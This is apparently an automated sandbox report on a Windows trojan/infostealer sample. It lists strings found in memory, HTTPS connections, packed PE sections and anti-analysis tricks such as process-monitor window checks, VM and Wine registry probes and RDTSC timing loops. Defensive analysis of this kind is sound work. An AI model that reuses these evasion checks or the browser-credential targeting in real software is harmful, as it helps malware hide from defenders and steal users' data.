            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
            Source: file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: file.exe, 00000000.00000003.954648651.0000000005419000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
            Source: file.exe, 00000000.00000003.1074715136.00000000054EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: file.exe, 00000000.00000003.1074840267.000000000570D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: file.exe, 00000000.00000003.1068212000.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164445689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005446000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164596542.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1008108100.0000000005408000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164420215.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1131988715.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1103118777.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.00000000053F1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132030690.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1068212000.0000000005432000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1070676945.00000000053EA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069487624.0000000005433000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1164119101.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1069410189.0000000005447000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102918112.00000000053E5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1102855632.00000000054E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1132235158.00000000053E1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.919426239.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1071204186.00000000053F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
            Source: file.exe, 00000000.00000003.1071963589.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
            Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49686
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
            Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
            Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
            Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
            Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49682 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49683 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49684 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49685 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49686 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49688 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49693 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49694 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49695 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.8:49696 version: TLS 1.2

            System Summary

            barindex
            PE file contains section with special chars
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: file.exeStatic PE information: Section: udvczyhg ZLIB complexity 0.9945707461371137
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@11/2
            Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: file.exe, 00000000.00000003.954051096.0000000005407000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1010545555.0000000005417000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.954614271.00000000053E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: file.exeVirustotal: Detection: 64%
            Source: file.exeReversingLabs: Detection: 60%
            Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: file.exeStatic file information: File size 2111488 > 1048576
            Source: file.exeStatic PE information: Raw size of udvczyhg is bigger than: 0x100000 < 0x1a0a00

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;udvczyhg:EW;wrnawoey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;udvczyhg:EW;wrnawoey:EW;.taggant:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
            Source: file.exeStatic PE information: real checksum: 0x206218 should be: 0x212dff
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: .idata
            Source: file.exeStatic PE information: section name:
            Source: file.exeStatic PE information: section name: udvczyhg
            Source: file.exeStatic PE information: section name: wrnawoey
            Source: file.exeStatic PE information: section name: .taggant
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB5E pushad ; retf 0_3_00B0CB61
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB5E pushad ; retf 0_3_00B0CB61
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB5E pushad ; retf 0_3_00B0CB61
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB5E pushad ; retf 0_3_00B0CB61
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB4E push eax; retf 0_3_00B0CB51
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB4E push eax; retf 0_3_00B0CB51
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB4E push eax; retf 0_3_00B0CB51
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB4E push eax; retf 0_3_00B0CB51
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB62 pushad ; retf 0_3_00B0CB65
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB66 push 6800B0CBh; retf 0_3_00B0CB6D
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00B0CB52 push eax; retf 0_3_00B0CB55
            Source: file.exeStatic PE information: section name: entropy: 7.1961402952181865
            Source: file.exeStatic PE information: section name: udvczyhg entropy: 7.954347737644204

            Boot Survival

            barindex
            Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
            Query firmware table information (likely to detect VMs)
            Source: C:\Users\user\Desktop\file.exeSystem information queried: FirmwareTableInformationJump to behavior
            Tries to detect sandboxes / dynamic malware analysis system (registry check)
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28617D second address: 286181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A41 second address: 401A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A46 second address: 401A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A4D second address: 401A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A58 second address: 401A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A5C second address: 401A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401A60 second address: 401A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401D35 second address: 401D89 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2E7D1D3436h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 jbe 00007F2E7D1D3436h 0x00000017 jno 00007F2E7D1D3436h 0x0000001d jmp 00007F2E7D1D3446h 0x00000022 popad 0x00000023 push edi 0x00000024 jmp 00007F2E7D1D3440h 0x00000029 pushad 0x0000002a popad 0x0000002b pop edi 0x0000002c jng 00007F2E7D1D3438h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 popad 0x00000036 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401EBF second address: 401EE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2E7D257EC0h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401EE1 second address: 401EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 401EE5 second address: 401EF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F2E7D257EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4020A2 second address: 4020CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2E7D1D3451h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4020CC second address: 4020D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4020D0 second address: 4020D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405190 second address: 405194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405194 second address: 40519A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405206 second address: 40521C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2E7D257EC1h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 40521C second address: 405266 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b stc 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2E7D1D3438h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 sbb di, 8253h 0x0000002d call 00007F2E7D1D3439h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 push edi 0x00000036 pop edi 0x00000037 jmp 00007F2E7D1D343Ah 0x0000003c popad 0x0000003d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 405266 second address: 4052AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jns 00007F2E7D257ED2h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push edi 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4052AD second address: 4052C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jo 00007F2E7D1D344Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2E7D1D343Ah 0x00000015 rdtsc
